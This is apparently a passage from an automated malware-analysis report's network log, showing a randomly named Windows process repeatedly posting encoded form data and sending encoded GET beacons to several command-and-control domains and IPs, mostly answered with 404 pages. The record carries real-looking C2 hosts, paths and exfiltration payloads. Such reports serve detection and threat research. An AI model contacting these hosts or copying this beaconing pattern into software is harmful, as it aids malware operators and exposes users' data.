                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    34 | 192.168.2.5 | 49746 | 206.119.82.147 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:10.021898985 CEST | 745 | OUT | POST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=7OFv+ElOXEe7xAgMlnL/e3avWY3dsNnv7GtPDjcDC0ok5QEoPxOzCOe+hddEoj5B8Rn+yLInCxFJU92UV4juS5NC6WOpFdwQKlB6FaATI0E4Z2eK7nw+t6V0y/m/WTPXvxWGVMYuXDvnQl/7daKZpqlr0KMFBXx9NHVi41UJtwOjJiWFzZidCGjPpeOAcCC6ISOkwafXENwewHrtLHJgceOcYsW8
                                                                                                                    Sep 30, 2024 19:59:10.895567894 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:10 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    35 | 192.168.2.5 | 49747 | 206.119.82.147 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:12.562268019 CEST | 1762 | OUT | POST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Data Ascii: FbuX5DnP= [TRUNCATED]
Sep 30, 2024 19:59:13.747503042 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:13 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49748 | 206.119.82.147 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:15.111902952 CEST | 471 | OUT | GET /jo6v/?FbuX5DnP=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:59:16.057387114 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49749 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:21.781487942 CEST | 752 | OUT | POST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=qf4xXmfLixOG3NbGf2+R73Kr2wBD6Z91YNfRHmk4oBshHP7LKx+mXe7feG1ARcXbwEyVztYlrn8pgEAgMDcMhzpfwhJxgJ4tVEdJSKQRZTofylXEqEEgT63nBu1dEmeUCIvO3A2tgNmZW53/md7EY7eU/c4RQ/g7MJllDsdrONMdvGJCs0bgZcEEMP1pED6ovPSERPY=
Sep 30, 2024 19:59:23.008210897 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:22 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Sep 30, 2024 19:59:23.008272886 CEST | 431 | IN |
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49750 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:24.334729910 CEST | 772 | OUT | POST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyYhGqfLLzWmWe7fL21JMMXSwE+dzsklrkApgGYgMw0PgjpK/BJgvp4tVEdJSKU7ZTgfy1nErhwhNK3oCu1dAmePCIub3BqHgLqZW9z/mM7HS7eex85fWNQzBbpwGPBuXPIDuwko2WTIK8o8cc9eVzbB1sC0PYPdacz/A1wMGrIMeTRWTbU7
Sep 30, 2024 19:59:25.283422947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:25 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Sep 30, 2024 19:59:25.283484936 CEST | 431 | IN |
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49751 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:26.874069929 CEST | 1789 | OUT | POST /sfat/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Data Ascii: FbuX5DnP= [TRUNCATED]
Sep 30, 2024 19:59:27.967957973 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:27 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Sep 30, 2024 19:59:27.967972040 CEST | 431 | IN
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49752 | 46.17.172.49 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:29.437912941 CEST | 480 | OUT | GET /sfat/?2Zv0=qtmpl4wh&FbuX5DnP=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.galaxyslot88rtp.lat
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:59:30.352081060 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    pragma: no-cache
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 1251
                                                                                                                    date: Mon, 30 Sep 2024 17:59:30 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    platform: hostinger
                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    vary: User-Agent
                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Sep 30, 2024 19:59:30.352099895 CEST | 431 | IN
                                                                                                                    Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49753 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:35.541915894 CEST | 725 | OUT | POST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=DnTeUn8bQO0f8K7Q5ce7GPNCrzGcZ6X7fPWG25NECX9lWRP9Sf/J3iaeSwjJNp2cEaOFFtrdk81sGiT8vvvPRYeUd3upilrx8KiuxhO1q18kfFMcnYYSnzQyPRd4QwHyeuVwACryKF3U7tJtwQ+MMiAOYS4RqbDl4BlYWaF0czciBQ/jCx4VWQ99aT4Vt5QC1ZQDyDE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49754 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:38.085927963 CEST | 745 | OUT | POST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUCkJlYVH9TbjJyiaeaQjMCJ2XEaynFsXdk8xsGiD8vc3IRIeSQXu3mlrx8KiuxluPqxokc18cl8ENrTQxfBd4UwH2euVoAD2fKHPU7pBtxB+DbSBFHi5aur2giA5MKbR3DwglJGSJYTw9FwRFKAwi8Jxrv6AzsUSXOpK4LbFtXMQ7sk3Po6yf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49755 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:40.629388094 CEST | 1762 | OUT | POST /zlyl/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.dto20.shop
                                                                                                                    Origin: http://www.dto20.shop
                                                                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Data Ascii: FbuX5DnP= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49756 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:43.170650005 CEST | 471 | OUT | GET /zlyl/?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.dto20.shop
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:59:43.856339931 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:43 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 270
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4wh"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49757 | 144.34.186.85 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:48.907529116 CEST | 740 | OUT | POST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=xTyynNMo1ISp5aoBmx94ysT3TisgFb+A+j5MHP2rnbwHap0CiBzU3+wAQi6i9t1gQLhUndtPzukAO3gBIg0iKJ48SVDE1M2c0WdouDBROTQV/w0m9O9qDDoA1xvo6SpcpmZjpHjhpxhPHoWdNHom9DJ8b+fa4rswTKjyEh6TkOha7Kkq+ZVCmXFwHcpR/UCtaS7KtVs=
Sep 30, 2024 19:59:49.465857983 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:49 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49758 | 144.34.186.85 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:59:51.457986116 CEST | 760 | OUT | POST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mpkHdMYChAzU0+wAYC6rg91pQLtqndBPzuwAO3QBIXghLZ4+JlD8xM2c0WdouHprOTIV8BEm8v9rNjoByxvo+SpYpmYApC6Gp0tPHtqdNSchmTI5f+fP5aZSeIfbZi3l5vR83cJAk7dq13pIXPhmukjEAxr6zC4Fkl1nl0ZdegkcPJTrRwWe
                                                                                                                    Sep 30, 2024 19:59:52.044470072 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:51 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    47 | 192.168.2.5 | 49759 | 144.34.186.85 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:54.003180981 CEST | 1777 | OUT | POST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
